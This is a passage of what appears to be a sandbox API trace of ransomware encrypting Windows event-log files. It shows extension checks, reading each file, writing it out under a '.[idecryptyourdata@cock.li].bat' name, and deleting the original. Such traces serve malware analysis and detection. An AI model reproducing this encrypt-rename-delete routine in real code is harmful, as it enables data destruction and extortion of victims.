(lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 1 [0066.279] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString=".doc") returned 4 [0066.280] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".docx") returned 5 [0066.280] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.280] lstrlenW (lpString=".pdf") returned 4 [0066.280] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".xls") returned 4 [0066.280] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".xlsx") returned 5 [0066.280] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.280] lstrlenW (lpString=".ppt") returned 4 [0066.280] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString=".zip") returned 4 [0066.280] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".rar") returned 4 [0066.280] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".bz2") returned 4 [0066.280] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".7z") returned 3 [0066.280] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString=".dbf") returned 4 [0066.280] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString=".1cd") returned 4 [0066.280] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString=".jpg") returned 4 [0066.280] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.280] lstrlenW (lpString=".doc") returned 4 [0066.280] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.280] lstrlenW (lpString=".docx") returned 5 [0066.281] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.281] lstrlenW (lpString=".pdf") returned 4 [0066.281] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString=".xls") returned 4 [0066.281] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString=".xlsx") returned 5 [0066.281] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.281] lstrlenW (lpString=".ppt") returned 4 [0066.281] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.281] lstrlenW (lpString=".zip") returned 4 [0066.281] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString=".rar") returned 4 [0066.281] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString=".bz2") returned 4 [0066.281] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString=".7z") returned 3 [0066.281] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.281] lstrlenW (lpString=".dbf") returned 4 [0066.281] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.281] lstrlenW (lpString=".1cd") returned 4 [0066.281] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0066.281] lstrlenW (lpString=".jpg") returned 4 [0066.281] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.281] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.281] lstrlenW (lpString="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 64 [0066.281] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.282] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0066.282] CloseHandle (hObject=0x370) returned 1 [0066.282] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 0x20 [0066.282] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0066.282] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0066.282] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.282] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.282] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0066.282] GetLastError () returned 0x0 [0066.282] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0066.291] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0066.292] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.292] WriteFile (in: hFile=0x2c8, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x154, lpOverlapped=0x0) returned 1 [0066.292] SetEndOfFile (hFile=0x2c8) returned 1 [0066.292] CloseHandle (hObject=0x2c8) returned 1 [0066.293] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.293] SetEndOfFile (hFile=0x370) returned 1 [0066.294] CloseHandle (hObject=0x370) returned 1 [0066.294] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0066.294] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx")) returned 1 [0066.294] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.294] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.294] lstrlenW (lpString=".doc") returned 4 [0066.294] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.304] lstrlenW (lpString=".docx") returned 5 [0066.304] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.304] lstrlenW (lpString=".pdf") returned 4 [0066.304] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.304] lstrlenW (lpString=".xls") returned 4 [0066.304] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.304] lstrlenW (lpString=".xlsx") returned 5 [0066.304] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.304] lstrlenW (lpString=".ppt") returned 4 [0066.304] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.304] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.304] lstrlenW (lpString=".zip") returned 4 [0066.304] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.304] lstrlenW (lpString=".rar") returned 4 [0066.304] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".bz2") returned 4 [0066.305] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".7z") returned 3 [0066.305] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.305] lstrlenW (lpString=".dbf") returned 4 [0066.305] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.305] lstrlenW (lpString=".1cd") returned 4 [0066.305] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.305] lstrlenW (lpString=".jpg") returned 4 [0066.305] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.305] lstrlenW (lpString=".doc") returned 4 [0066.305] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".docx") returned 5 [0066.305] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0066.305] lstrlenW (lpString=".pdf") returned 4 [0066.305] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".xls") returned 4 [0066.305] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".xlsx") returned 5 [0066.305] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0066.305] lstrlenW (lpString=".ppt") returned 4 [0066.305] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.305] lstrlenW (lpString=".zip") returned 4 [0066.305] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".rar") returned 4 [0066.305] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".bz2") returned 4 [0066.305] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0066.305] lstrlenW (lpString=".7z") returned 3 [0066.305] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0066.306] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.306] lstrlenW (lpString=".dbf") returned 4 [0066.306] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0066.306] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.306] lstrlenW (lpString=".1cd") returned 4 [0066.306] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0066.306] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned 72 [0066.306] lstrlenW (lpString=".jpg") returned 4 [0066.306] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0066.306] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0066.306] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Debug.evtx") returned 41 [0066.306] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0067.131] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=1052672) returned 1 [0067.131] CloseHandle (hObject=0x3a0) returned 1 [0067.131] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 0x20 [0067.131] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0067.131] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0067.131] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.131] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0067.131] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0067.131] GetLastError () returned 0x0 [0067.131] ReadFile (in: hFile=0x3a0, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0067.152] WriteFile (in: hFile=0x350, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0067.166] ReadFile (in: hFile=0x3a0, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x1010, lpOverlapped=0x0) returned 1 [0067.898] WriteFile (in: hFile=0x350, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x1020, lpOverlapped=0x0) returned 1 [0068.119] ReadFile (in: hFile=0x3a0, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.119] WriteFile (in: hFile=0x350, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x126, lpOverlapped=0x0) returned 1 [0068.119] SetEndOfFile (hFile=0x350) returned 1 [0068.119] CloseHandle (hObject=0x350) returned 1 [0068.119] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.119] SetEndOfFile (hFile=0x3a0) returned 1 [0068.120] CloseHandle (hObject=0x3a0) returned 1 [0068.120] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.676] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx")) returned 1 [0068.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.735] lstrlenW (lpString=".doc") returned 4 [0068.735] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.735] lstrlenW (lpString=".docx") returned 5 [0068.735] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.735] lstrlenW (lpString=".pdf") returned 4 [0068.735] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.735] lstrlenW (lpString=".xls") returned 4 [0068.735] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.735] lstrlenW (lpString=".xlsx") returned 5 [0068.735] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.735] lstrlenW (lpString=".ppt") returned 4 [0068.735] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.735] lstrlenW (lpString=".zip") returned 4 [0068.735] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.735] lstrlenW (lpString=".rar") returned 4 [0068.735] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.735] lstrlenW (lpString=".bz2") returned 4 [0068.736] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".7z") returned 3 [0068.736] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString=".dbf") returned 4 [0068.736] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString=".1cd") returned 4 [0068.736] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString=".jpg") returned 4 [0068.736] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString=".doc") returned 4 [0068.736] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".docx") returned 5 [0068.736] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.736] lstrlenW (lpString=".pdf") returned 4 [0068.736] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".xls") returned 4 [0068.736] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".xlsx") returned 5 [0068.736] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.736] lstrlenW (lpString=".ppt") returned 4 [0068.736] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString=".zip") returned 4 [0068.736] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".rar") returned 4 [0068.736] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".bz2") returned 4 [0068.736] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0068.736] lstrlenW (lpString=".7z") returned 3 [0068.736] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0068.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.736] lstrlenW (lpString=".dbf") returned 4 [0068.737] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0068.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.737] lstrlenW (lpString=".1cd") returned 4 [0068.737] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0068.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned 49 [0068.737] lstrlenW (lpString=".jpg") returned 4 [0068.737] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0068.737] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0068.737] lstrlenW (lpString="Microsoft-Windows-Store%4Operational.evtx") returned 41 [0068.737] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.738] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0068.738] CloseHandle (hObject=0x37c) returned 1 [0068.738] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 0x20 [0068.738] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0068.738] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0068.738] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.738] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.738] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0068.739] GetLastError () returned 0x0 [0068.739] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0068.741] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0068.742] ReadFile (in: hFile=0x37c, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0068.742] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x126, lpOverlapped=0x0) returned 1 [0068.743] SetEndOfFile (hFile=0x2c0) returned 1 [0068.743] CloseHandle (hObject=0x2c0) returned 1 [0068.743] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0068.743] SetEndOfFile (hFile=0x37c) returned 1 [0068.744] CloseHandle (hObject=0x37c) returned 1 [0068.744] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0068.744] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 1 [0068.744] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.744] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.744] lstrlenW (lpString=".doc") returned 4 [0068.744] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0068.744] lstrlenW (lpString=".docx") returned 5 [0068.744] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0068.744] lstrlenW (lpString=".pdf") returned 4 [0068.744] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0068.744] lstrlenW (lpString=".xls") returned 4 [0068.744] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0068.744] lstrlenW (lpString=".xlsx") returned 5 [0068.744] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0068.744] lstrlenW (lpString=".ppt") returned 4 [0068.745] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0068.745] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0068.745] lstrlenW (lpString=".zip") returned 4 [0068.745] lstrcmpiW (lpString1=".zip", 